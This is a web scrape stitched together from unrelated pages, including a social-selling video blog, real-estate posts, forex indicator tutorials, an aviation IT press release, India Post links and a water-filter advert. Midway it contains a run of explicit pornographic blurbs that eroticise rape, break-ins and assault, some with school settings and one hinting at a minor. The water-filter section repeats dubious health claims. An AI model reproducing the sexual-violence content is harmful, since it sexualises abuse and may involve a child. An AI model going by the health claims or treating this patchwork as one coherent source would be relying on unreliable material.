Nothing is better than networking at a live conference but in some cases you can’t attend the event due to travel, location, costs and schedule conflicts. Here is where Social Media “Social Channel News” comes into play.
In the past you had to wait for blog posts and article recaps, listen for interviews, follow the event twitter hashtag “#SMMW15” for updates etc. Video is the media channel that resonates best with me when monitoring an event. I want to see the digital experience. The benefits for the viewer are obvious. Video can be more engaging and compelling than text.
What are the benefits of Video Coverage for event planners, program coordinators and conference directors?
Video Coverage improves the visibility and coverage of your event. Increase the size of your audience.
Video will support the shelf life of your event. Relevancy has a deadline and video can amplify and extend it.
Please continue to post and write great updates, share the experience. Focus on using your mobile device as content curator tool. More tweets, more pictures do some video! Tell and share the event story with visual marketing
We have the technology today to capture live events with greater impact. Let’s leverage “Social Channels” and “Video” to make this happen.
It’s obvious that social video marketing can amplify and build brand awareness for conferences and events. Don’t be Oblivious to power and impact of event video marketing today. Let’s put the social in your events with video!
No business card no problem. Let’s go digital, save a tree and leverage your brand contact information across multiple social networking sites and sharing platforms. I just started using Ingio, a digital business card application for smartphones and it’s awesome.
What are your thoughts on digital business cards? I think that they can make an impact on all networking levels.
We all have witnessed some long boring non engaging sales webinars and video hangouts. So what makes a good video hangout? Well I have the perfect example of what it takes to produce a quality hangout. Here is my video review of Jim Keenan’s “The Word A Jolt of Sales 411 w/Keenan” #Salesjolt
For this video review, we are focusing on the hangout’s video production value not the sales content message. Content is extremely important and Jim and his team delivered. I look forward to future episodes because they are informative, educational, thought-provoking and damn compelling. I choose to learn and be entertained and this video hangout hits that mark. Nice work! Team A Sales Guy
What are some of the reasons your sales have stalled and leveraging social is not achieving the desired result. Barb Giamanco and I look at this sales conundrum and more in this short video.
Can we agree that if used correctly “Social” can be a great resource for understanding today’s buyers and customers. Social can provide advanced credibility, social proof and help enhance the sales process. Social Selling is a methodology not a replacement or quick shortcut for sales results.
Social enables the sales process and it’s not a substitute for lead generation, prospecting and presenting. It still comes down to the simple fact can you sell and deliver to your customers effectively and efficiently?
Are you a sales professional in transition? Are you underemployed at your current job? Creating and using an online portfolio may help build exposure and land the next opportunity. This is in addition to your own company website, bio page, sales blogs and other social networking sites like LinkedIn and Google Plus. It’s a must to have all your social networking sites updated and profiles completed.
Now creative marketers, designers, artists and digital savvy professionals get this but are Sales Professional utilizing online portfolios?
I’ve been using Visual CV for almost 6 years and I like it. I also like the simplicity of about.me grouping all your social channels in one place. Both BrandYourself and Branded.me are new sites for me but I like what I see. These personal branding websites are simple to set up and share with your network.
What are your thoughts on using video resumes or videos to engage with customers, candidates and potential employers?
Am I underemployed, looking for better opportunities and more clients? Speaking for myself, the simple answer is YES and building my personal brand, bringing value is paramount. Become a visual digital leader leveraging online social proof tools that resonate with your customers, clients, social peers and employers.
Here are a few of my online portfolio’s. To put it to you in Lehman’s Terms, these were easy to set up and share.
I am a big fan or should I say advocate of companies that engage their customers and provide a great service or product offering. My experience with Chill Puck meets this scenario. Chill Puck has a dynamic product and they get social engagement.
As a social selling advocate, I like to connect with like-minded sales and marketing professionals. Back in December, I connected online with Jack Kosakowski, Social Sales Advisor for Chill Puck. I became familiar with Jack and Chill Puck watching numerous video chats like the #Socialhangout reading blog posts, updates and tweets. We connected instantly on Twitter and LinkedIn etc.
My initial experience with Chill Puck was off to a great start. Chill Puck sent me some samples and the rest is history. I tested the product and liked the concept but more importantly, I loved how the team from Chill Puck interacts and engages with customers online socially. Establishing social proof online, building and maintaining relationships and never leaving future advocates and customers behind.
I could write much more about The Chill Puck Experience but a video is good way to tell this business story, conceptualize, visualize and recognize a cool product socially.
In Lehman’s Terms Chill Puck is refreshing because they get social engagement and they have a really cool product. Checkout you their website at http://www.chillpuck.com for more details and follow them on social channels. A big thanks to Team Chill Puck, Curtis Peters and Nishan Pilibosian Founders and the Social Selling Advocate Jack Kosakowski for their support socially and keeping my drinks cold. Follow Chill Puck on Twitter @TheChillPuck
What would you like to see more of this year when it comes to Social Business and Communication? I hope to see more visual marketing and video collaboration among social networks and video partnerships.
My 2015 Wish List is simple more video collaboration. More people are engaging on social networking sites and blogs. You can see the comments, posts and updates on multiple social channels for business. It could be LinkedIn comments, retweeted tweets, Google + 1, repins, likes, re-posts etc. 2015 should be year for business to share more video and engage their audience more socially.
The next time you produce a video or do a Google Hangout, encourage interaction look for comments and respond socially just like you do on other social networking sites. Video is such an easily platform to share Let’s keep it Social with Video.
I plan to share more video content this year but more importantly I plan to engage with others on video more by sharing and commenting.
I’m a big advocate of leveraging videos for sales and social business. My passion is social selling videos. I recently launched a new video series on the topic of video reviews. My first review’s looked at Brian Solis and Hootsuite on the topic of social selling insight. We also looked at a Microsoft Dynamics video with Fred Studer on the topic Social Selling and mobile customer engagement. Top (VIDEO) reviews on social selling business –video collaboration show.
Here is my latest video review hosted by Sales for Life. Jamie Shanks and Company do a tremendous job on training and being ambassadors for Social Selling. The Team from Sales for Life has a great video featured on their website titled “Traditional Selling VS Social Selling” I encourage you to watch the video and check out my review.
What I like about this cartoon explainer video is that it’s well produced and loaded with several facts on the benefits of social selling and the sales process. I also like the fact that this video is compelling, engaging, entertaining and fun. If you’re looking for an explainer video on social selling this it.
I’ve been producing videos on the topic of social selling for over four years now and have experimented with cartoons and animations. To me, nothing beats the human effect of being on camera but cartoons and animations have their place. It all comes down to telling that visual digital story in a compelling and engaging style. A call to action helps.
Have you used explainer videos, cartoons or animation style videos for your video marketing? I would love to get your thoughts and insight on these types of videos for the sales process.
As a video blogger, I’m truly passionate about sales training leveraging social and video to generate results. I do a lot of online video research and it is always good to learn from the best visual business storytellers. It is even better to share insightful video information.
This month, I decided to create a new video review show spotlighting some of the best business videos out there. I look forward to reviewing multiple videos in the next couple of months very similar to my video book reviews. My mission is to share insightful Videos that are worth a watch, simple content curation with video collaboration. In Lehman’s Term’s putting the social in business video for social business, video marketing and sales.
Why Video? I believe video it is the most compelling and engaging social channel out there. Video is easy to share and video collaboration is powerful. In 2015, more businesses will be doing video, I only hope more people will comment and engage on social video platforms. In Lehman’s Terms putting the social in video. It is easy to comment on a video, leave a response and share the digital story.
Do you have video in mind that should be shared socially? I am always looking for content in social media marking and sales training. What is your video business story?
"Doug's passion is apparent and genuine in all of his videos. By doing his homework before going on camera, Doug makes everything look easy and natural which is not easy to do!"
Archives Select Month May 2018 March 2018 November 2017 December 2016 November 2016 August 2016 July 2016 February 2016 January 2016 December 2015 September 2015 August 2015 July 2015 June 2015 April 2015 March 2015 February 2015 January 2015 December 2014 November 2014 October 2014 September 2014 August 2014 July 2014 June 2014 May 2014 April 2014 March 2014 February 2014 January 2014 December 2013 October 2013 September 2013 August 2013 July 2013 May 2013 April 2013 March 2013 February 2013 January 2013 December 2012 November 2012 October 2012 September 2012 August 2012 July 2012 June 2012 May 2012 April 2012 March 2012 January 2012 December 2011 November 2011 October 2011 September 2011 August 2011 July 2011 June 2011 May 2011 April 2011 March 2011 February 2011 January 2011 December 2010 November 2010 October 2010 September 2010 August 2010 July 2010
A proactive Video Marketer and Sales Trainer that’s partnered with and work for companies and organizations like IBM, Microsoft Dynamics, Sun Microsystems, Cisco and Youngstown State University, effectively closing sales to enterprise accounts, small to medium sized businesses and the consumer market across multiple industries. Currently specializing in sales training videos, brand awareness videos, video blogging and client testimonials for small business owners, entrepreneurs, trainers, authors and minority based organizations. Passionate about customer engagement training, leveraging the tools of sales, social media and video to generate results.
Bladder Tanks installedStandard Height Struts Was a Clipper 1 Floats removed and new skid tubes installed Paint Condition 6.5/10Interior 7/10 Headliner good carpet needs replacedShip is located in Lexington KY at a Robinson Service CenterService center can crate and ship Buyer Responsible for shipping. Current date: 2018-03-06
Blog Description: Reflections on organizational leadership/development, faith and money and all their intersections.
Pay anyone with an email address. The recipient receives the payment instantly. Moneybookers beats the cost, delay and inconvenience of traditional payment methods.
e-gold is the only tangibly backed, worldwide electronic monetary/payments system. e-gold is 100% backed by physical gold (silver, platinum, palladium)
Online shopping from the earth's biggest selection of books, magazines, music, DVDs, videos, electronics, computers, software, apparel & accessories, shoes, jewelry, tools & hardware, housewares, furniture, sporting goods, beauty & personal care, gourmet food & just about anything else.
Terri was setting appointments recently for several different buyers and ran across way too many homes that were hard to show. If you are selling your New Orleans home, you probably want to learn from the mistakes of others and not make your house end up at the bottom of the list because it’s too hard to show.
If your New Orleans home is on the market, it needs to be available for showings. Period. Not just on Tuesdays, not just when your agent can unlock the door, not just when the listing agent feels like answering their phone.
Disclaimer: Multiple Listing Data provided at CrescentCityLiving.com is deemed reliable but not guaranteed. It is good practice to verify all information with a Real Estate Licensee before taking any action based upon this data. Listing data is made available for the use of consumers interested in the acquisition of real property only. Use of this data for any other purpose is strictly forbidden without the written consent of the Gulf South Real Estate Information Network.
I’m in a lot of Facebook groups related to real estate. With agents participating from every corner of the country, there are always some differences of opinion on how our business should be handled.
Recently, there was a discussion about contacting homeowners who had their house on the market, but the listing agreement has expired. I have to admit that my mouth dropped open when I saw a broker say:
“I ignore the do not call list with expireds. Sellers are often happy to hear from an aggressive agent.”
If you are on the national Do Not Call list and REALTORS call you (particularly those “aggressive” agents), you can report the illegal calls here.
If you ever get one of these calls from an agent with Crescent City Living, please contact me immediately at (504) 616-6262. We do things differently and disregard for your privacy is never acceptable or tolerated.
Trying to get other agents in trouble lately? Perhaps you should just worry about your agents instead of using this to try to run others out of business.
“Mario”, I’m not trying to get anyone in trouble. Agents that ignore the Do Not Call List do so at their own peril and the risk of consumer complaints. Letting consumers know what their rights are has nothing to do with worrying about someone else’s agents or trying to run someone out of business.
Archivio Select Month February 2014 August 2012 June 2012 May 2012 March 2012 January 2012 October 2011 August 2011 July 2011 June 2011 May 2011
The 0.1 to 200 PSIG Calibrator Box allows you to adjust both zero and full scale of and any 0.1 to 2 ...
As our season winds to a close we kick into high-gear for final exams. The PSIA-AASI Community has a great discussion thread right now on exam tactics. The thread is full of great advice, and the discussion is ongoing. Get…
Cert Kickoff is this Friday, 11/25 and Saturday, 11/26! Friday’s focus is on Alpine and Snowboard Level 1 and 2 Certifications, with breakouts for Adaptive certification and Children’s and Freestyle Specialist following the certification breakouts. Saturday’s focus is on Alpine…
Vail Pros, Hopefully you’ve been able to get out and enjoy the amazing snow we’ve received in the last few weeks. As we enter this snowy February, there are a many opportunities to train with some of the best trainers…
Vail Ski & Snowboard School delivers instruction that offers inspiration, adventure, and self-discovery. We have a long-standing reputation for going beyond a typical lesson and providing transformative experiences that create memories and build life-long skills.
We’ve already covered a lot of tools that can help you analyze potential trending and range-bound trade opportunities.
A lagging indicator gives a signal after the trend has started and basically informs you “Hey buddy, pay attention, the trend has started and you’re missing the boat.”
You would “catch” the entire trend every single time IF the leading indicator was correct every single time. But it won’t be.
When you use leading indicators, you will experience a lot of fakeouts. Leading indicators are notorious for giving bogus signals which could “mislead” you.
Lagging indicators only give signals after the price change is clearly forming a trend. The downside is that you’d be a little late in entering a position.
It’s kinda like wearing bell-bottoms in the 1980s and thinking you’re so cool and hip with fashion….
It’s kinda like getting excited buying a new flip phone that now takes photos when the iPhone 7 came out…
For the purpose of this lesson, let’s broadly categorize all of our technical indicators into one of two categories:
We’re not saying that one or the other should be used exclusively, but you must understand the potential pitfalls of each.
But don't just read our analysis - put it to the rest. Your forecast comes with a free demo account from our provider, IG, so you can try out trading with zero risk.
Your demo is preloaded with ?10,000 virtual funds , which you can use to trade over 10,000 live global markets.
Article Summary: Many traders learn to use the indicators that are based on past price action to develop a trading plan. While many of these indictors have their place, there are other indicators that help you see where price is likely to stop before the time arrives. Naturally, this can be a very useful tool in your trading.
When a new trader decides to incorporate charting into their trading, they often don’t know where to start. Most often, a quick search of how to find opportunities on the charts will lead you to the more popular indicators like a moving average, relative strength index or RSI, the moving average convergence divergence or MACD, or a Stochastic type indicator that shows you how markets oscillate up and down. The common thread of these types indicators is that they use a recent close of past price candles to hopefully anticipate immediate action to follow.
There is nothing wrong with looking at the last several periods in the market to determine aspects like whether the markets are trending or ranging. That is the often the best method to get the context for what is most likely the current state of the market. However, entering trades may be better done through price reacting to a leading indicator.
There are a handful of leading indicators that could not be given their due justice here. However, it’s important to know of the popular ones so that you can find one that works well with your current form of analysis. The basic function of a leading indicator is to help you see how price could unfold.
Pivot points are a personal favorite because they are the most objective of leading indicators. Pivot points are taken from critical past price points and then a calculation is plotted on the chart to give you three key levels. The pivot point sits in the middle of the calculations with resistance points or profit targets for buy trades above the pivot point and support or profit targets on sell trades. Therefore, if you believe EURUSD is likely to move higher you could target the green resistance levels and put a stop below the lower support level that matches your risk management rules.
Elliott Wave is a theory about the market in how trends and corrections unfold. The main arguments are that a trend subdivides into 5 waves with each wave displaying distinct characteristics. The leading nature of Elliott Wave comes in its use of Fibonacci ratios. If you’re unfamiliar with how to trade Fibonacci relationships, you can register for this FREE online course HERE . One common ratio that is used to define a profit target is that wave 5 often travels 61.8% of the distance covered in waves 1-3.
Trading with sentiment may seem counter intuitive at first. That is because a trading signal comes from reading sentiment by taking a trade in the direction of the trend but is opposite against the majority of traders or investors. Therefore, if there is a strong uptrend but the majority of traders are short or selling, then you would look to enter against the majority and trade in the direction of the trend.
The reason that sentiment is considered a leading indicator is that it is used on the premise that all things being equal, a trend will continue and traders who are fighting the trend will only prolong its existence as they exit their trades against the trends to prevent themselves from losing more capital.
The IG Client Sentiment or IGCS is updated once a day for DailyFX. Otherwise, it is updated once a week. This information can be very helpful in giving you an edge during a strong trend.
There are no perfect indicators. By their nature, an indicator will help you see likely outcomes; however, you shouldn’t seek certainty because it does not exist within indicators. Leading indicators can be a helpful addition once you know how to use them to capture an edge in your trading and hopefully this article has made you more comfortable in accessing these great options.
Signup for this free “Trade like a Professional” certificate course to help you get up to speed on Forex market basics. You can master the material all while earning your completion certificate.
DailyFX provides forex news and technical analysis on the trends that influence the global currency markets.
Indicators can be separated into two main types - leading and lagging - both differing in what they show users.
Leading indicators are those created to precede the price movements of a security giving predictive qualities.
Two of the most well-known leading indicators are the Relative Strength Index (RSI) and the Stochastics Oscillator.
We will cover the RSI indicator in more detail later on in this tutorial, but for now to get an idea of how it can be used as a leading indicator, take a look at the chart of International Business Machines (IBM) shown below. Notice how the RSI indicator shown at the top of the chart is trending upward while the price of the stock was moving lower. Active traders who were able to spot the divergence between the indicator and the underlying price were able to open a position before the move higher occurred. Entering a position early, or leading a move before others are able to determine what is going on is the primary goal of many who use technical analysis .
The majority of leading indicators are oscillators. This means that these indicators are plotted within a bounded range. The oscillator will fluctuate into overbought and oversold conditions based on set levels based on the specific oscillator.
Note: An example of an oscillator is the RSI, shown above, which varies between zero and 100. A security is traditionally regarded as overvalued when the RSI is above 70 and oversold when the RSI is below 30. In the case of IBM, you can see how overbought and oversold readings would have allowed traders to anticipate major changes in the price of the company’s shares before the rest of the market took notice.
A lagging indicator is one that follows price movements and has less predictive qualities. The most well-known lagging indicators are the moving averages and Bollinger Bands®. The usefulness of these indicators tends to be lower during non-trending periods but highly useful during trending periods. This is due to the fact that lagging indicators tend to focus more on the trend and produce fewer buy-and-sell signals. This allows the trader to capture more of the trend instead of being forced out of their position based on the volatile nature of the leading indicators.
The two main ways that indicators are used to form buy and sell signals are through crossovers and divergence.
Crossovers occur when the indicator moves through an important level or a moving average of the indicator. It signals that the trend in the indicator is shifting and that this trend shift will lead to a certain movement in the price of the underlying security.
For example, by taking a look at the chart of Nike Inc. (NKE), you can see that the crossover between the 50-day and 200-day moving averages (shown by the blue circle was a clear signal of the beginning of a major uptrend. (For more on this topic, check out: How To Use A Moving Average To Buy Stocks)
The second way indicators are used is through divergence, which was shown in the example of IBM above. Divergence occurs when the direction of the price trend and the direction of the indicator trend are moving in the opposite direction. This signals that the direction of the price trend may be weakening as the underlying momentum is changing.
There are two types of divergence - positive and negative. Positive divergence occurs when the indicator is trending upward while the security is trending downward. Positive divergence is the type of divergence shown on the chart of IBM above and is a bullish signal that suggests the underlying momentum is starting to reverse and that traders may soon start to see the result of the change in the price of the security. Negative divergence works in the opposite manner and occurs when an indicator starts to trend lower while the price of the underlying security trends upward. Negative divergence is a popular bearish signal that is used by traders for identifying periods where momentum is weakening during an uptrend.
For example, notice on the chart of Biogen Inc. (BIIB) below, that the relative strength index was trending downward while the security's price was trending upward. This negative divergence would be used to suggest that even though the price was lagging the underlying strength, based on the RSI, traders would still expect to see bears control of the asset's direction and have it conform to the momentum predicted by the indicator.
Indicators that are used in technical analysis provide an extremely useful source of additional information. These indicators help identify momentum, trends, volatility and various other aspects in a security to aid traders when making decisions. It is important to note that while some traders use a single indicator solely for buy and sell signals they are best used in conjunction with price movement, chart patterns, and other indicators. (For related reading, see Technical Analysis Strategies for Beginners)
Banimmo has started work on the renovation of a building located in Evere in view of the Brussels office of the Swedish Group Electrolux.
Banimmo and Triodos Bank have signed a credit agreement to complete this operation. The energy performance of this project has been one of the decisive criteria for the decision of Triodos Bank to finance the project.
This significant repositioning, key activity of Banimmo, with a surface of almost 9,000 m² will be finished by mid-2011 and will allow Electrolux to occupy a renovated building in the Brussels Region with a very high energy performance.
The building will be the object of an environmental certificate, but it is already obvious that, although the current regulation for new buildings requires a coefficient of maximum E90 and K45, the building will reach an energy performance coefficient of E64 and K20.
Thanks to its technical characteristics the building will achieve an extremely low level of primary energy consumption of 30 kWh/m²/year for the heating and 20 kWh/m²/year for the ventilation and the cooling.
Banimmo is investigating the possibilities to deliver other 'built to suit' buildings to other significant corporations concerned about their environment-image.
Triodos Bank has been active in Belgium for 17 years and it finances only activities with a positive sustainable impact in the social, environmental and cultural field.
April 19, 2018 Africa, America, Asia, Australia, Europe, India, Middle East, New Zealand, Technology News No comments
The future of air transport will be driven by a digital transformation in the industry, according to Barbara Dalibard, CEO of global IT provider, SITA. Dalibard was speaking at the Asia Pacific Air Transport IT Summit which gathered C-level airline and airport executives from across the region to discuss the future in this dynamic growth region.
Asia Pacific is leading the tremendous growth in the air travel industry. By 2036, the region is expected to handle over 4.1 billion passengers – more than half of the world’s passenger traffic. With this growth comes challenges and stresses on infrastructure and processes. The industry also faces increased complexity and security regulation globally. Dalibard outlined how technology can provide real value and help the industry navigate the future.
Dalibard said: “Smart use of technology can help manage the challenges of rising passenger numbers, limited infrastructure and increased complexity. At SITA, we are looking at opportunities to harness technologies including biometrics, artificial intelligence, machine learning, robotics and blockchain to transform the industry.
“Already biometrics is becoming more commonplace at airports around the world and is delivering secure seamless travel from check-in to boarding. Today we work with around 40 governments providing border management solutions. And we have biometric self-service solutions operating worldwide, including in Australia, USA, Mexico and the Middle East.”
SITA is owned by the air transport industry and so has a unique commitment to address community issues. It is investing in new technologies with its industry partners. For example, SITA worked with British Airways, Heathrow, Geneva and Miami airports to explore the opportunity to use blockchain technology for the shared control of data.
Recently, SITA has also invested in research to help airlines and airports tackle the $25 billion annual cost of poor on-time performance. SITA’s technology harnesses advance machine learning and artificial intelligence to forecast aircraft arrival times as far out as 24 hours giving airports the opportunity to proactively manage and mitigate disruption.
Autonomous vehicles and the potential use of robotics is another field of development, with particular interest shown at the event in Kansai Airport’s trial of KATE, SITA’s autonomous check-in robot.
Dalibard added: “By embracing the Internet of Things and connecting everything across the industry we will produce more data which can be used with artificial intelligence to create valuable insights and expose new ways of working. Over the next 20 years, this use of digital technologies to improve service, operations and efficiency will have profound effects on the air transport industry.”
One example of where this is beginning to happen is baggage management. 2018 is the year the International Air Transport Association (IATA) Resolution 753 comes into effect, which will see the industry increase end-to-end baggage tracking. This tracking produces data which reveals where improvements can be made in baggage management processes.
Speaking on the topic, Dalibard commented: “While we won’t see a sudden change in 2018, it is a real turning point for the industry as airlines begin to unlock the value of the tracking data for the 4.65 billion bags they carry. Looking further ahead, combining data collected from bag tracking with data science and machine learning promises even more significant improvements in baggage handling operations. This in turn will reduce costs and improve the passenger experience, a transformation that will be welcomed by everyone.”
SITA is the communications and IT solution provider that transforms air travel through technology for airlines, at airports and on aircraft. The company’s portfolio covers everything from managed global communications and infrastructure services, to eAircraft, passenger management, baggage, self-service, airport and border management solutions. Owned 100 percent by more than 400 air transport industry members, SITA has a unique understanding of its needs and places a strong emphasis on technology innovation.
Nearly every airline and airport in the world does business with SITA and its border management solutions are used by more than 30 governments. With a presence at more than 1,000 airports around the world and a customer service team of 2,000+ staff, SITA delivers unmatched service to more than 2,800 customers in more than 200 countries.
In 2016, SITA had consolidated revenues of US$1.5 billion. SITA’s subsidiaries and joint ventures include SITAONAIR, CHAMP Cargosystems and Aviareto.
With the best 2019 Europe Early birds, STUBA can provide top deals for hundreds of destinations, and provides the best 24/7 support in the industry.
ETB Travel News Ambassador and Contemporary Indigenous artist Chern’ee Sutton loves to share her peoples history and stories through her art, this week read the story of “Matjumpa” – The Kangaroo
Though Scoot's new route to Berlin obviously connects the airline's vast Asia-Pacific flight network with the German capital
Professor Bob McKercher is widley recognised as one of the world's leading authorities on tourism trends in China. He is in Sydney and ETB Travel News readers have an opportunity to hear from this outstanding tourism expert
The small sleepy village of Teotitlan del Valle is famous for the Tepetes, handmade wool rugs coloured by natural means using fruits, minerals, clays, vegetables, flowers and insects
My journey into this industry isn't a great tale, a romantic one or one of great purpose….I just fell into it! But it has been a great tale since then!
ETB Travel News is a global travel and tourism news provider offering dedicated editions across the globe, it is free to subscribe.
Our editorial and sales team are readily available to assist you with your next story or advertising campaign.
To be a part of ETB News, send us your news or for a tailored advertising package, we’d love to hear from you.
To find out more about advertising or partnering with ETB Travel News visit our Media Kit. Click on the button below
You are about to download the Talion 1.0.60 apk file for Android 4.4 and up: No Mercy. No regret. CBT is now open ...
Please note that the Talion apk file v1.0.60 is the original apk file obtained from the official Google Play server. It DOES NOT contain any mod, cheat, crack or unlimited gold patch. You could now read more about Talion app, review app permissions or choose a server to download it.
Google Play and the Google Play logo are trademarks of Google Inc. Talion is the trademark of the developer GAMEVIL. All apk files on APK4Fun are only for home or personal use.
Mary was looking in the mirror and suddenly saw the reflection of a scary masked guy standing behind her. She instinctively turned around and tried to resist him as he began tearing off her dress and panties, but he smashed her lip with a powerful blow and forced his crying victim to swallow his thick cock and then spread her legs to let him penetrate into her tight slit.
Bill ordered a glass of beer, took a long swig and nearly thrown up from its disgusting taste. He handed it back to the waitress and told her that he is not going to pay for this piss. She haughtily took the glass, looked into it and then poured the beer over his face. He pulled down the front of her top revealing swaying mounds of her tits and she tried to smash the glass on his head. Angered and horny, he gagged her with her apron, pressed her hands to the wall and started tearing off her clothes biting her nipples and pulling up her panties that painfully cut between her pussy lips. She tried to break away from his hands, but he then tossed her to the floor and forced her to sex.
Lauren played with her old toys, when a man wrapped in a white sheet entered the room and started approaching her. Scream stuck in her throat, when he grabbed her legs, pulled off her pants and started sticking his stiff cock between her clenched lips. She kept her mouth shut, but the man didn't stop beating her face with one of her toys until she opened her mouth letting his cock inside.
Ann went out of the bathroom and was shocked to find two burglars scouring her bedroom. They noticed her and tossed onto the bed. One of the burglars gagged her mouth and started pulling off her bathrobe, while the other one held her legs removing her panties. When both succeeded, they started penetrating her mouth and pussy and didn't stop till both holes were stuffed with cum.
Steve hated this haughty rich bitch that always mocked him in school, because he couldn't afford a car. Having lost patience he stole her keys, made a copy and started waiting. Finally he heard her saying that her parents left for Europe and broke into her house on the same evening. Luckily she was in bath, completely naked and prepared for his revenge.
Campus life is fun and it opens great opportunities to meet sexy girls, date and fuck them, but Tom and Andy had another plans for Joanna. Since her neighbor left for holidays, it made no trouble to break in her room having opened it with a stolen key. Joanna was sleeping when two throbbing cocks and huge dildo was pretty ready for dirty action!
Melinda had to think two times before giving bad marks to her students. Of course, she deserved to be punished and Rick chose himself as a weapon of revenge. It wasn't hard to find her address in the phone book and she didn't expect anything dangerous opening the door to her student. How wrong she was!
A perfectly planned sex cannot be prevented. Bruce and Kyle prepared everything in advance. They used a picklock to get into her flat and started waiting for their victim. Riley opened the door and was immediately dragged to the kitchen, bent down onto the table and stuffed with two stiff cocks. They pounded her tight pussy and virgin ass and filled both holes with hot cum.
Carl and Isabelle have been dating for over a month, but they haven't done more than kiss and she doesn't seem to plan more. It irritated and angered Carl and finally his patience worn thin. He tried to seduce her once more and when she refused again he forced her to get naked and enjoyed her hot mouth, clean shaved pussy and virgin ass in all imaginable ways.
Irene woke up with a dreadful headache and since the pills didn't help, she called the ambulance. She was surprised, when they told her to remove her jeans, panties and t-shirt, because she never thought that her pussy and tits are somehow connected with the headache, but when they took off her panties and started fingering her pussy, she realized that they've come for something else.
Justin and Sam were allured by their charming young teacher from the very first lecture, but all their awkward attempts to seduce her failed, so they decided to enjoy her gorgeous body against her will. They broke into her flat, tied her hands and gave Miss Jones a couple of cock-sucking, pussy drilling and cum swallowing lessons.
David hid himself near the stairwell and started waiting for his victim. Soon he heard her heels clattering on the stairs and when she passed his ambush he silently approached her from behind, grabbed her by the waist, gagged her mouth with his hand and dragged kicking and twisting slut to his flat. She couldn't stop crying, when he fastened her to the chair and stripped her of her clothes preparing the bitch for brutal domination.
Amanda convinced Kyle to try sex with another girl and they started looking for a suitable chick. Finally they've chosen their busty classmate and Amanda invited her to their place. They drank a bottle of wine talking about school and stuff and then Amanda told her that she wants to see her tits and when Pauline tried to resist, they forced her onto the bed and fucked her.
Taylor was lying on the sofa and watching TV. She was shocked to notice a guy who stared at her standing on the window still and rubbing his cock through his pants. She jumped out of the sofa and tried to run away from the room, but he quickly caught her, torn off her clothes and pressed her to the sofa thrusting his throbbing cock into her virgin pussy.
Daniel realized that the only possible way to enjoy adorable body of his sexy blonde neighbor is to fuck her. He broke into her house and hid himself under the staircase and when she went downstairs Daniel jumped out of his ambush and threatened her with a shout. He took the scared bitch to the bedroom, where he forced her to get naked and introduced her to his restless cock.
In respect of Uttarakhand flood Google provides short summary of resources relating to relieft and rescue efforts in the Uttarakhand on Google Maps
helps people reconnect with friends and loved ones in the aftermath of natural and humanitarian disasters.
PLEASE NOTE: On active Person Finder sites, all data entered is available to the public and usable by anyone. Google does not review or verify the accuracy of this data.
Following function convert ( Rupees in figure ) numeric value in a Microsoft Excel worksheet cell into its equivalent in (Rupees in Word ) ...
You can track and trace International Articles of India Post on ipsweb.ptcmysore.gov.in/ipswebtracking . Tracking of Inward as well as out...
Universal Postal Union, Letter Post Regulations International Letter Mail Forms required for operations at Office of exchanges
Universal Postal Union, Letter Post Regulations , Letter Mail Forms required for operations at Office of exchanges List...
Find below links to open New Speed Post discount structure, operational mechanism and procedure of delivery... Procedure of delivery of Sp...
The construct of the logo is inspired by the fact that India Post carries emotion across physical distance. At first glance, it is an enve...
Mumbai Customs authority published Customs Clearance procedure for India Post Customers on their website Mumbai Customs. Source : Mumbai...
All the information published in this webpage is submitted by users or free to download on the internet. I make no representations as to accuracy, completeness, currentness, suitability, or validity of any information on this page and will not be liable for any errors, omissions, or delays in this information or any losses, injuries, or damages arising from its display or use. All information is provided on an as-is basis. All the other pages you visit through the hyper links may have different privacy policies. If anybody feels that his/her data has been illegally put in this webpage, or if you are the rightful owner of any material and want it removed please email me at "foreignmumbaitest@gmail.com" and I will remove it immediately on demand. All the other standard disclaimers also apply.
Transfer and postings Senior Administrative Grade (SAG) officers of the IPS Group'A' - India Post (2)
Few desires are so fierce as the thirst for water. Wholesome water is vital to the workings of every organ and tissues. It maintains our body temperature, flushes poisons from the bloodstream and gives form to every cell. It bathes and cushions our brain and provides our lungs with the moisture they need to breathe. Without water, arms couldn't flex, eyes couldn't see and heart couldn't beat. Yet, nature's hydrological cycle strives relentlessly to replenish our water supply, but modern society is constantly polluting it and our water may no longer be regarded as dependably wholesome.
Ideally drinking water should be physically attractive, free from all harmful bacteria and have a chemical content which will promote the health of the consumer. Wholesome water can now be obtained only from pristine alpine sources in the form of bottled spring water at double the premium of gasoline price.
With a Doulton water filter you and your family can can enjoy water the way it was meant - wholesome and refreshing - glass after thirst - quenching glass.
Doulton water is fresher, better tasting and less costly than bottled water and more convenient. No worries about the source of bottled water. No hurried trips to the store when you run out. Doulton water is always in good taste. Fresh and pure. As much you want. When you want it.
"It is chronic dehydration that causes the pains and degenerative diseases of the human body." Miracles in Ordinary Water! On WaterCure site you can order F. Batmanghelidj, M.D. books "Your Body's Many Cries for Water", "Water Cures: Drugs Kill" ,"Water: For Health, For Healing, For Life", "Water: Rx for A Healthier Pain-Free Life".
Doulton filters are featured in Ann Louise Gittleman’s books "Fat Flush Cookbook" and "Why Am I Always So Tired?" which is about copper zinc nutritional imbalance.
Ann Louise Gittleman, PhD., C.N.S., is the author of more than a dozen health books, including the best selling Fat Flush Plan. Her books have sold over 3 million copies. Ann Louise has been named one of the country's Top Ten Nutritionists by Self Magazine and has also been named a Pioneer in the 21st Century Approach to Optimum Health by Total Health for Longevity Magazine. She maintains a private practice, consults for medical establishments, contributes regularly to national magazine features, and is a popular guest on television and radio.
Latest news and articles about world water problems and water pollution by CNN, ABC, BBC, Fox, NBC, other news sources
Seattle Post - Bottled water urged in Seattle schools. Board member expresses concerns to Manhas on inconsistent lead tests - October 27, 2004
A Seattle School Board member met with Superintendent Raj Manhas yesterday, urging him to bring back bottled water at a number of schools over concerns about inconsistent lead tests and other contaminants.
Cities across the country are manipulating the results of tests used to detect lead in water, violating federal law and putting millions of Americans at risk of drinking more of the contaminant than their suppliers are reporting.
Washington Post - District to Issue Warning on Lead. Health Advisory on Water to Target Pregnant Women, Small Children - February 25, 2004
* "What's on Tap? Grading Drinking Water in U.S. Cities" Report released on June 11th 2003 by the Natural Resources Defense Council (NRDC)
Dear Friends, Wow, what an amazing few years it’s been! We are humbled by the endurance you, the supporters, have shown during the “voting series” the rail trail has gone through. Yesterday’s vote was the fifth (yes, the fifth!) vote that the people of this town have taken in the past 8 years regarding the rail…
It’s been forty years since the Dover demon was first spotted on Farm Street. Its whereabouts and habits have remained a mystery since then… Until now!!!
